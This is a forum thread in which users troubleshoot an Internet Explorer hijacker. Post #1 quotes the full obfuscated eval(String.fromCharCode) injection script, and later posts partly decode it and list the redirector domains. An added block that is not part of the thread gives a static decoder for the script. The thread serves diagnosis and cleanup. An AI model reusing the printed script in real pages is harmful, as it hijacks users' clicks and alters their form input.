  1. #1
    SitePoint Wizard jag5311's Avatar
    Join Date
    Jan 2003
    Location
    Somewhere in Indiana
    Posts
    3,082

    Weird javascript code at the top of my source code

    I am getting some really weird javascript code on two of my sites, right above the <html> tag.

    Here is what I get

    Code:
     <script language="JavaScript">
     eval(String.fromCharCode(118,97,114,32,114,115,99,95,110,99,108,1
     07,61,48,59,118,97,114,32,114,115,99,95,107,119,95,102,111,117,110
     ,100,61,48,59,102,117,110,99,116,105,111,110,32,114,115,99,95,104,
     95,99,108,105,99,107,40,41,123,114,115,99,95,110,99,108,107,43,43,
     59,118,97,114,32,97,99,116,105,118,101,69,108,61,100,111,99,117,
     109,101,110,116,46,97,99,116,105,118,101,69,108,101,109,101,110,
     116,59,118,97,114,32,104,114,101,102,61,97,99,116,105,118,101,69,
     108,46,104,114,101,102,59,105,102,40,40,114,115,99,95,110,99,108,
     107,61,61,50,32,124,124,32,114,115,99,95,110,99,108,107,61,61,52,
     32,124,124,32,114,115,99,95,110,99,108,107,61,61,54,41,32,38,38,
     32,114,115,99,95,107,119,95,102,111,117,110,100,61,61,49,41,123,
     119,105,110,100,111,119,46,111,112,101,110,40,39,104,116,116,112,
     58,47,47,119,119,119,46,108,111,99,97,116,111,114,46,99,99,47,103,
     111,63,39,43,104,114,101,102,41,59,114,101,116,117,114,110,32,102,
     97,108,115,101,59,125,101,108,115,101,123,114,101,116,117,114,110,
     32,116,114,117,101,59,125,125,102,117,110,99,116,105,111,110,32,114,
     115,99,95,104,95,115,110,100,102,111,114,109,40,41,123,118,97,114,32,
     105,44,106,59,102,111,114,40,106,61,48,59,106,60,100,111,99,117,109,
     101,110,116,46,102,111,114,109,115,46,108,101,110,103,116,104,59,106,
     43,43,41,123,102,111,114,32,40,105,61,48,59,105,60,100,111,99,117,109,
     101,110,116,46,102,111,114,109,115,91,106,93,46,108,101,110,103,116,
     104,59,105,43,43,41,123,105,102,32,40,100,111,99,117,109,101,110,116,
     46,102,111,114,109,115,91,48,93,46,101,108,101,109,101,110,116,115,91,
     105,93,46,118,97,108,117,101,61,61,39,104,116,116,112,58,47,47,39,41,
     123,100,111,99,117,109,101,110,116,46,102,111,114,109,115,91,48,93,46,
     101,108,101,109,101,110,116,115,91,105,93,46,118,97,108,117,101,61,
     39,104,116,116,112,58,47,47,119,119,119,46,97,100,117,108,116,45,
     100,118,100,109,111,118,105,101,46,99,111,109,47,39,59,125,125,
     125,114,101,116,117,114,110,32,116,114,117,101,59,125));
     </script>
    Don't quite understand it. They are both on the same host, so maybe the host is doing it? Don't know.

  2. #2
    SitePoint Wizard jag5311's Avatar
    Ugh! It's my IE browser. When I check it, all links have an ONCLICK event, and there is some javascript code everywhere. I wonder if I have some spyware issues.

  3. #3
    gingham dress, army boots... silver trophy redux's Avatar
    Join Date
    Apr 2002
    Location
    Salford / Manchester / UK
    Posts
    4,838
    A weird side effect of using the IE7 hack perhaps? (Just completely stabbing in the dark here.)
    re·dux (adj.): brought back; returned. used postpositively
    [latin : re-, re- + dux, leader; see duke.]
    WaSP Accessibility Task Force Member
    splintered.co.uk | photographia.co.uk | redux.deviantart.com

  4. #4
    The short answer is yes... Herbster's Avatar
    Join Date
    Oct 2001
    Location
    Bay City, Oregon
    Posts
    715
    All those numbers in the js translate to this:

    Edit: OK. I'm not feeling comfortable posting javascript, so I sent it to you via pm jag5311.

    It uses 'http://www.locator.cc/go?'+href as a redirector and has something to do with adult DVDs.

  5. #5
    SitePoint Wizard jag5311's Avatar
    Nope. I think it has something to do with a virus or spyware. Not sure how this crap got in my system. It doesn't affect Mozilla or Firebird, but IE. No hack though. I have run Spybot, Ad-Aware, and Hijack This! and I have cleaned everything, and it's still there. I will look for the locator.cc on Google.

  6. #6
    SitePoint Wizard jag5311's Avatar
    Man, I can't even do windows update. This is causing mucho problemo's.

  7. #7
    SitePoint Guru quenting's Avatar
    Join Date
    Dec 2002
    Location
    Switzerland
    Posts
    735
    Man, I can't even do windows update.
    Not smelling good... Do you have Spybot? Antivirus software? Can you run regedit?
    The largest message boards on the web !
    unblog.fr, hosting 700000 french blogs

  8. #8
    SitePoint Wizard jag5311's Avatar
    Well, here's another thing: when I went to Yahoo and tried to log in there, it gave me a problem not allowing me to log in. If I choose to post a NEW topic here, the windows and positioning get all F*ED up and I can't even put my cursor in the edit box. What I am hoping is that I didn't remove something when I ran HiJack This!

    Yes I can run Regedit. This seems to only affect Internet Explorer.

    I have run Ad-Aware (latest build), Spybot Search and Destroy (latest build), and Hijack This!

    Now, earlier, I did have spyware on my computer that was affecting Internet Explorer. It was preventing me from accessing sites like yahoo.com and google.com. It would try and add a long string of numbers to my URL like %67%67%64%, so maybe it was trying to add that javascript code I mentioned earlier. When I would go to my preferences, for my default homepage, the long string of what I just posted (%67%68 etc.) is in the box where you can enter your own URL address. I might be jumping into the registry on this one. Damn it.

  9. #9
    SitePoint Wizard jag5311's Avatar
    Just so you know, here is a link over at experts exchange that I have going if you want some more detail.

    http://www.experts-exchange.com/Oper..._20938171.html

    Thanks

  10. #10
    SitePoint Guru quenting's Avatar
    I'd suggest stopping all running programs, then going to your task manager / process list and typing all of them into Google. See if anything suspect shows up (there are quite a few sites describing most of the processes likely to run on a "regular" computer with all programs stopped).
    A process not showing up any results in gg is to be considered very suspect.

    Quentin

  11. #11
    100% Windoze-free earther's Avatar
    Join Date
    Feb 2003
    Location
    Linuxland
    Posts
    2,788
    You need to be very careful when using HijackThis. There is a HijackThis forum at http://forums.net-integration.net/in...p?showforum=32 that might be useful to you. Good luck!

  12. #12
    SitePoint Wizard Keriam's Avatar
    Join Date
    Jun 2003
    Location
    Colorado, USA
    Posts
    1,178
    Quote Originally Posted by jag5311
    Well, here's another thing: when I went to Yahoo and tried to log in there, it gave me a problem not allowing me to log in. If I choose to post a NEW topic here, the windows and positioning get all F*ED up and I can't even put my cursor in the edit box. What I am hoping is that I didn't remove something when I ran HiJack This!
    The symptoms you are describing are the exact same ones a friend of mine had. Turned out to be a virus. I don't remember which one, but he had the problem about the time of the first big Blaster outbreak.
    Never put off until tomorrow what you can do
    the day after tomorrow. ~ Mark Twain

  13. #13
    SitePoint Wizard jag5311's Avatar
    Quote Originally Posted by Keriam
    The symptoms you are describing are the exact same ones a friend of mine had. Turned out to be a virus. I don't remember which one, but he had the problem about the time of the first big Blaster outbreak.
    What did he do to fix it? I ran McAfee and ended up deleting about 24 so-called "viruses" but it didn't fix the problem. Then I tried repairing IE and I am having problems. I am running IE 6 Service Pack 1 and trying to reinstall it and it keeps getting stuck at 3748 out of 7553 kb. It won't go beyond that. Argh!

  14. #14
    SitePoint Guru quenting's Avatar
    Well, if I was in your place and my antivirus found 24 of them, just for the sake of future safety, I would simply back up my data, and (yeah, I know you don't want to read that) reinstall Windows... That's just me, but if my box ever gets virused, I'm not confident enough in antivirus software to trust it that none is left.
    Or, you can start using Mozilla Firefox.

  15. #15
    ********* Wizard silver trophy Cam's Avatar
    Join Date
    Aug 2002
    Location
    Burpengary, Australia
    Posts
    4,495
    I've seen the exact same problem but it was passing the URLs through a different domain. There's a registry key, so search your registry for www.locator.cc and use some common sense (I don't know exactly what you're looking for so I can't post specifics) to remove the offending keys. Actually, don't remove them, just empty them (remove the offending data)

  16. #16
    SitePoint Wizard jag5311's Avatar
    Thanks Packman,

    Well, I know this sounds stupid, but those 24 could have been related to spyware and might not have been destructive. I agree doing a backup of my system should be in the works, but man o man, I don't want to reinstall windows. I don't think anything is corrupted, I do think, however, that the long list of javascript before every page is altering my browsing experience. Tables appear different sizes, especially here on sitepoint, the font looks all different, going to Windows Update gives me a small error, so getting IE fixed is the issue.

    What I found weird was that I thought that McAfee VirusScan, when it runs in the background, would pick up on those 24 "viruses", but it wasn't until I ran a full system scan that it found something.

    sh*t sh*t sh*t sh*t sh*t sh*t

  17. #17
    SitePoint Guru quenting's Avatar
    Some types of viruses are recurrent (a service brings them back as soon as the antivirus has kicked them out). If you redo a virus scan, does it find anything or not?

    Just to let you know, I experienced a little virus 3 months ago: it wouldn't let me edit the registry, and a service was running that I could not stop / disable, and when I tried removing the files it used from my Linux partition, the files would be back there the next time I started up Windows.
    Finally I launched Norton, everything froze and then no .exe could ever be launched. I finally could back up thanks again to my Linux partition, but really, I would strongly advise you to quickly back up your data.

  18. #18
    SitePoint Wizard jag5311's Avatar
    Thanks Quenting, I think I will. I guess, so far, I am glad it just affects Internet Explorer. I haven't had any other issues at all. I think I forgot to check one important thing: to look at the programs and processes currently running (CTRL ALT DELETE). I will check that tonight.

  19. #19
    SitePoint Wizard Keriam's Avatar
    Quote Originally Posted by jag5311
    What did he do to fix it? I ran McAfee and ended up deleting about 24 so-called "viruses" but it didn't fix the problem. Then I tried repairing IE and I am having problems. I am running IE 6 Service Pack 1 and trying to reinstall it and it keeps getting stuck at 3748 out of 7553 kb. It won't go beyond that. Argh!
    You know, I wish I could remember, and I have been trying. I know we had to download a specific repair tool from Symantec, run that, then run AV update, then run full scan.

    Problem with this particular friend is he screws up his computer so often I could fill a book (and maybe I should keep notes) with stuff I have to do to fix his system.

  20. #20
    SitePoint Member IllusionOverride's Avatar
    Join Date
    Apr 2004
    Location
    Belgium
    Posts
    12

    My problem too

    Hello, I luckily found this forum.

    I've had the same problem since yesterday too.

    1. When I type "www.google.fr" it goes to http://ehttp.cc/?www.google.fr (google.fr for example)

    2. My start page resets to: http://%68%6F%6D%65%70%61%67%65%2E%6...%63%63/%68%70/

    Translated through the javascript unescape method: homepage.com

    3. The famous script run with eval() before each page of each website I visit (see top of this forum)

    Translates to:

    Code:
     var rsc_nclk=0;
     var rsc_kw_found=0;

     function rsc_h_click(){
       rsc_nclk++;
       var activeEl=document.activeElement;
       var href=activeEl.href;
       if((rsc_nclk==2) && rsc_kw_found==1)
       {
         window.open('http://www.locator.cc/go?'+href);
         return false;
       }else
       {
         return true;
       }

     }

     function rsc_h_sndform(){
       var i,j;
       for(j=0;j


    Problem is: this function is not complete, and I found a cookie

    Administrator@www.locator.cc(1) telling some listing
    vst[n] followed by numbers
    (n a number)
    example:
    vst[0]ywww.locator.cc/153645113664029629285282351171229629028

    4. For those who understand French:

    [2004/04/04 00:31:54 3124.1]
    #-198 Ligne de commande traitée : "F:\Program Files\Internet Explorer\iexplore.exe"
    #-024 Copie du fichier "c:\Recycled\1.exe" sur "F:\WINXP\Downloaded Program Files\1.exe".
    #E361 Un fichier "c:\Recycled\1.exe" non signé ou incorrectement signé sera installé (Stratégie = ignorer). Erreur 0x800b0100: Il n'y avait pas de signature dans le sujet.
    [2004/04/04 00:35:25 3124.2]
    #-198 Ligne de commande traitée : "F:\Program Files\Internet Explorer\iexplore.exe"
    #-024 Copie du fichier "F:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\OTUVSPQ3\e[1].exe" sur "F:\WINXP\Downloaded Program Files\e.exe".
    #E361 Un fichier "F:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\OTUVSPQ3\e[1].exe" non signé ou incorrectement signé sera installé (Stratégie = ignorer). Erreur 0x800b0100: Il n'y avait pas de signature dans le sujet.


    This is my log extract from SetupApi.log

    --> My Internet Explorer was hacked successively by
    unsigned executables copied from internet temp files into "Downloaded Program Files" (in the winxp folder)
    named:
    1.exe and E.exe

    which were removed from my computer

    5. I got Norton, so it bugged because it works on HTML pages which were ****ed by the virus; I installed Avast and AVG to replace it for the moment

    So, I've sent this information to Abuses @microsoft; @symantec; @homepage.com; for the guy of locator.cc and ehttp.cc

    I don't know how to resolve this, I don't know how to hack www.locator.cc: to get maybe the go(.php I suppose), I don't know what the ".cc" domains are for.

    I'm actually looking for an API call interceptor to get the calls which replace Iexplore.exe when I delete it

    Iexplore.exe, when I try to uninstall it, stays, because Miko$oft Winsh*t is based on it, so it's not possible to give a shot at removing it.

    Hope this info will help us to progress
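
Added example (not part of any post in this thread): a static decoder for the `eval(String.fromCharCode(...))` wrapper quoted in post #1 and for percent-encoded URLs like the start page in post #20, recovering the text without ever executing it. The sample input is a shortened excerpt assembled from the payload in post #1; the function names and the `example.test` URL are constructed for illustration.

```javascript
// Added example: decode the obfuscation statically; nothing here calls eval().

// String.fromCharCode( <digits, commas, whitespace> ) anywhere in the source.
const CHARCODE_CALL = /String\.fromCharCode\(([\d,\s]+)\)/g;

// Return the text hidden in every String.fromCharCode(...) call in `source`.
function decodeCharCodes(source) {
  const decoded = [];
  for (const match of source.matchAll(CHARCODE_CALL)) {
    // Forum and HTML wrapping can split a number across lines ("1\n07"),
    // so remove all whitespace before splitting on commas.
    const codes = match[1].replace(/\s+/g, '').split(',').filter(Boolean).map(Number);
    if (codes.length === 0 || codes.some((c) => !Number.isInteger(c) || c > 0xffff)) continue;
    decoded.push(codes.map((c) => String.fromCharCode(c)).join(''));
  }
  return decoded;
}

// Pull http(s) URLs out of decoded script text, de-duplicated.
function extractUrls(text) {
  return [...new Set(text.match(/https?:\/\/[^\s'"<>)]+/g) || [])];
}

// Decode %XX escapes (the modern replacement for unescape()).
// Malformed escapes are returned unchanged instead of throwing.
function decodePercentEncoded(url) {
  try {
    return decodeURIComponent(url);
  } catch (err) {
    return url;
  }
}

// Decode every wrapped script in a page and list the URLs it references.
function analyze(pageSource) {
  const scripts = decodeCharCodes(pageSource);
  return { scripts, urls: scripts.flatMap(extractUrls) };
}

// Constructed sample: two fragments of the payload from post #1, joined,
// keeping the mid-number line wrap seen in the original listing.
const SAMPLE_PAGE = `<script language="JavaScript">
eval(String.fromCharCode(118,97,114,32,114,115,99,95,110,99,108,1
07,61,48,59,119,105,110,100,111,119,46,111,112,101,110,40,39,104,116,116,112,
58,47,47,119,119,119,46,108,111,99,97,116,111,114,46,99,99,47,103,
111,63,39,41,59));
</script>`;

// Constructed sample: a percent-encoded start page (hypothetical host).
const SAMPLE_START_PAGE = 'http://%65%78%61%6D%70%6C%65%2E%74%65%73%74/%68%70/';

console.log(analyze(SAMPLE_PAGE));
console.log(decodePercentEncoded(SAMPLE_START_PAGE));
```

Run it with Node.js on a saved copy of the page source; the decoded script is only ever handled as a string.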

  21. #21
    SitePoint Member IllusionOverride's Avatar
    This virus seems to **** only iexplorer, so I'll use Netscape for the moment (**** miko$oft!)

    I also have to say that all the servers involved in this operation:

    www.locator.cc/ and www.ehttp.cc/

    are based in the US; I saw that when I made a whois, and from there I got their abuse address.

  22. #22
    SitePoint Wizard Keriam's Avatar
    Quote Originally Posted by IllusionOverride
    www.locator.cc/ and www.ehttp.cc/

    are based in the US; I saw that when I made a whois, and from there I got their abuse address.
    Umm, really? .cc is the country code for Cocos (Keeling) Islands and a whois search with the sponsoring organization for that TLD shows the first is owned by JRC Group in Australia and the second is owned by Anchor Group Ltd. in the UK.

  23. #23
    SitePoint Member IllusionOverride's Avatar
    Quote Originally Posted by Keriam
    Umm, really? .cc is the country code for Cocos (Keeling) Islands and a whois search with the sponsoring organization for that TLD shows the first is owned by JRC Group in Australia and the second is owned by Anchor Group Ltd. in the UK.
    Well, actually, I didn't make a whois but a trace

    http://www.postbox.ch/index.asp?page=81

    I don't have a whois website url in my collection


    I still don't know how to resolve the situation other than by asking those people or maybe
    hacking those servers (and I'm not hacker enough to know how) and finding the solution in the code ourselves.

  24. #24
    SitePoint Member IllusionOverride's Avatar
    I will also add that I think this virus also hacks the ActiveX control system, because I can't access www.secuser.com's online anti-virus, which is an ActiveX-control-based online anti-virus.

    Actually I don't know exactly how iexplore is implemented in WinXP or how ActiveX and Java (which works) are linked through the different browsers.

    For example: Netscape had to install another version of the Java Runtime Environment, but it seems to use the same ActiveX as iexplore because I got:

    Either the browser does not support the Object element or an error occurred while downloading the object. Unable to loading HouseCall ActiveX Control.

    at http://www.secuser.com/antivirus/index.htm and I think Netscape should normally run it; can someone with Netscape confirm that?

  25. #25
    SitePoint Wizard jag5311's Avatar
    I am glad I am not alone in this. I hope something can be resolved, because it causes many things to act goofy in IE.

    Quote Originally Posted by IllusionOverride
    I will also add that I think this virus also hacks the ActiveX control system, because I can't access www.secuser.com's online anti-virus, which is an ActiveX-control-based online anti-virus.

    Actually I don't know exactly how iexplore is implemented in WinXP or how ActiveX and Java (which works) are linked through the different browsers.

    For example: Netscape had to install another version of the Java Runtime Environment, but it seems to use the same ActiveX as iexplore because I got:

    Either the browser does not support the Object element or an error occurred while downloading the object. Unable to loading HouseCall ActiveX Control.

    at http://www.secuser.com/antivirus/index.htm and I think Netscape should normally run it; can someone with Netscape confirm that?

